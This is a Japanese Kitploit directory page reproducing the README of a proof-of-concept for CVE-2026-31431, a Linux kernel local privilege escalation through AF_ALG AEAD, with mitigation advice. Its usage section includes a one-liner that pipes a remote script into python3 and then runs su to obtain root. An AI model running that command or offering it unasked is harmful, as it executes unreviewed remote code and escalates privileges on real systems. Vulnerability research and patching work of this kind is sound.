Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/ademzero/cve-2026-31431
特権昇格脆弱性分析エクスプロイト学習と教育
GitHubademzero/cve-2026-31431

CVE-2026-31431

# 教育用概念実証:AF_ALG algif_aead を介した Linux カーネルのローカル権限昇格(CVE-2026-31431) 防御研究のための使用方法と緩和策のガイダンスを含みます。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-31431 - Copy Fail PoC

CVE-2026-31431 の教育用 Proof of Concept です。Copy Fail としても知られる、Linux カーネルの AF_ALG / algif_aead 暗号インターフェースに関わるローカル権限昇格の脆弱性です。

[!WARNING] このリポジトリは、教育、防御、および許可されたセキュリティ研究の目的のみで提供されています。

所有していないシステム、または明示的な書面によるテスト許可がないシステムでは、このコードを実行しないでください。

許可のない使用は違法となる可能性があります。


概要

CVE-2026-31431 は、Linux カーネルの暗号サブシステムに影響を与えるローカル権限昇格の脆弱性です。

この脆弱性は、AF_ALG インターフェースを通じて公開される AEAD パスに関係しており、ローカルの非特権ユーザーが読み取り可能なファイルに関連するページキャッシュデータに干渉し、脆弱なシステム上で権限昇格につながる可能性があります。

このリポジトリには、管理されたラボ環境を対象とした最小限の教育用 Proof of Concept が含まれています。


要件

対象システムは、必要な AF_ALG AEAD アルゴリズムを公開している必要があります。

これは次のコマンドで確認できます:

root@kitploit:~
grep -i "authencesn\|authenc" /proc/crypto

PoC は、次のようなアルゴリズムのサポートを期待しています:

root@kitploit:~
authencesn(hmac(sha256),cbc(aes))

アルゴリズムが利用できない場合、PoC は次のようなエラーで失敗する可能性があります:

root@kitploit:~
FileNotFoundError: [Errno 2] No such file or directory

これは、必要なカーネル暗号アルゴリズムがシステム上で利用できないことを意味します。


使用方法

リポジトリをクローンします:

root@kitploit:~
git clone https://github.com/Karim33z/CVE-2026-31431.git
cd CVE-2026-31431

PoC を実行します:

root@kitploit:~
python3 poc.py

または直接実行します:

root@kitploit:~
curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su

互換性に関する注意

一部の Linux システムでは、/usr/bin/su の代わりに /bin/su を使用します。正しいパスは次のコマンドで確認できます:

root@kitploit:~
which su

必要に応じて、poc.py 内のターゲットパスを調整してください。


トラブルシューティング

AEAD アルゴリズムが見つからない場合

authencesn(hmac(sha256),cbc(aes)) へのバインド中に FileNotFoundError: [Errno 2] No such file or directory が発生した場合、必要なカーネルアルゴリズムが利用できません。

利用可能な暗号アルゴリズムを確認します:

root@kitploit:~
cat /proc/crypto

またはより具体的に:

root@kitploit:~
grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto

su パスが間違っている場合

PoC が /usr/bin/su を参照しているが、システムが /bin/su を使用している場合は、次のコマンドで確認します:

root@kitploit:~
which su

その後、poc.py 内のパスをそれに応じて更新してください。


緩和策

防御側は、ディストリビューションベンダーが提供するパッチ適用済みの Linux カーネルバージョンに更新する必要があります。

カーネルを更新した後、システムを再起動して、パッチ適用済みカーネルがアクティブであることを確認してください。

一時的な緩和策としては、環境とディストリビューションに応じて、影響を受けるカーネル暗号機能へのアクセスを制限することが含まれる場合があります。


法的免責事項

このプロジェクトは以下の目的のみを意図しています:

  • セキュリティ研究
  • 防御的検証
  • 教育目的
  • 許可されたラボテスト

作者は、このコードによって引き起こされる誤用、損害、または違法行為について責任を負いません。

明示的な許可があるシステムでのみ使用してください。


ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。

ツールをダウンロード